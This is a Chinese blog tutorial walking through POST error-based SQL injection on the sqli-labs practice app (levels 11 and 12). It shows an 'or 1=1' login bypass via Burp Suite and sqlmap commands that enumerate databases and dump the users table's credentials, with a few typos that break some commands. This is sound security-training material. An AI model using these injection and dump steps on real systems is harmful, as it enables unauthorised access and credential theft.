post 基于错误的注入 sqli-lab

本文详细介绍了SQL注入攻击中GET和POST方法的区别。GET注入发生在URL参数中,而POST注入需要通过表单交互。以sqli-labs的less11和less12为例,演示了如何利用Bruter Suite进行信息拦截和SQL注入,并展示了如何使用sqlmap进行数据库探测和数据提取。通过实例解释了SQL注入的原理和步骤。
摘要由CSDN通过智能技术生成

get注入与post注入区别

get注入可以直接在URL上进行传输参数。
post注入是基于输入框进行注入,所以得使用辅助工具进行注入。

post注入的两个前提:
1.输入框可以交互
2.输入的语句会进入到数据库进行信息查找

下面我们用sqli-lab less11来举一个例子

less11

在这里插入图片描述首先我们使用brupsuite进行信息拦截。这里我们得到了发给web的http请求。我们把这条信息发送到repeater上进行注入。

在这里插入图片描述我们可以先对sql语句进行判断。
select uname,passwd form tables where ‘uname’ and ‘psaawd’ limit 0,1
我们注入一个万能密码,or 1=1
可以看到已经进入数据库
在这里插入图片描述当然我们可以注入其他语句,进行数据库查询等等。

less12

在这里插入图片描述less12就是一个双引号加括号闭合,注入方法与less11一样,就不再多说。
我们接下来用sqlmap进行探测。

sqlmap

1.首先我们先进行数据库探测
sqlmap -r target.txt --current-db --technique E --batch

2.得到目前正在使用的数据库名,查看此数据库表名。

sqlmap -r target.txt -D security --tables --technique E --batch

3.得到数据表之后我们对感兴趣的数据进行字段收集

sqlmap -r target.txt -D security -T --cloumns --technique E --batch

4.进行用户名和密码探查

sqlmap -r target.txt -D security -T users -C ‘username,psaaword’ --dump --technique E --batch

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值